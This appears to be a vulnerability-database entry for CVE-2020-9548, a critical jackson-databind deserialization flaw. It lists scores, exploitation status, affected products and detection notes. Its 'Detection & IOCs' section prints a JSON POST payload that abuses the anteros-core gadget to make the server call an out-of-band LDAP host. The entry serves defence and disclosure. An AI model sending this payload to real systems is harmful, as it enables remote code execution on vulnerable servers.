cbcvebase.
CVE-2020-9548
published 2020-03-02

CVE-2020-9548: FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to…

PriorityP180critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
18.34%
96.9th percentile
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPConfig (aka anteros-core).

Affected

51 ranges· showing 25
VendorProductVersion rangeFixed in
debiandebian_linux
debianjackson-databind< jackson-databind 2.11.1-1 (bookworm)jackson-databind 2.11.1-1 (bookworm)
fasterxmljackson-databind>= 0 < 2.11.1-12.11.1-1
fasterxmljackson-databind>= 0 < 2.11.1-12.11.1-1
fasterxmljackson-databind>= 0 < 2.11.1-12.11.1-1
fasterxmljackson-databind>= 0 < 2.11.1-12.11.1-1
fasterxmljackson-databind>= 0 < 2.4.2-3ubuntu0.1~esm22.4.2-3ubuntu0.1~esm2
fasterxmljackson-databind>= 2.0.0 < 2.7.9.72.7.9.7
fasterxmljackson-databind>= 2.8.0 < 2.8.11.62.8.11.6
fasterxmljackson-databind>= 2.9.0 < 2.9.10.42.9.10.4
netappactive_iq_unified_manager>= 7.3
netappactive_iq_unified_manager>= 9.5
oracleagile_plm
oracleautovue_for_agile_product_lifecycle_management
oraclebanking_digital_experience
oraclebanking_digital_experience
oraclebanking_digital_experience
oraclebanking_digital_experience
oraclebanking_digital_experience
oraclebanking_digital_experience
oraclebanking_platform2.4.0 – 2.9.0
oraclecommunications_calendar_server
oraclecommunications_contacts_server
oraclecommunications_contacts_server
oraclecommunications_diameter_signaling_router8.0.0 – 8.2.2

Detection & IOCsextracted from sources · hover to see the quote

otherbr.com.anteros.dbcp.AnterosDBCPConfig
commandPOST / HTTP/1.1 Content-Type: application/json ["br.com.anteros.dbcp.AnterosDBCPConfig",{"healthCheckRegistry": "ldap://{{interactsh-url}}"}]
  • Out-of-band DNS/LDAP callback detection: monitor for unexpected outbound LDAP connections originating from the Java application server following receipt of a JSON deserialization payload.
  • Response-based detection: a response body containing 'Error: Class' with content-type 'text/plain' alongside a DNS interaction indicates a vulnerable endpoint probed with the anteros-core gadget.
  • Polymorphic deserialization must be enabled for this vulnerability to be exploitable; audit Jackson ObjectMapper configurations for enableDefaultTyping() or @JsonTypeInfo usage.
  • ·Vulnerability only exploitable when polymorphic deserialization (default typing) is enabled in the Jackson ObjectMapper configuration.
  • ·OpenDaylight ships the vulnerable jackson-databind but does not expose it in a way that makes it exploitable, reducing effective attack surface.
  • ·OpenShift Container Platform elasticsearch plugins ship the vulnerable component but do not perform the unsafe deserialization operations required for exploitation.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
osv9.8CRITICAL
vulncheck9.8CRITICAL
vendor_debian9.8CRITICAL
vendor_redhat9.8CRITICAL
vendor_ubuntu9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.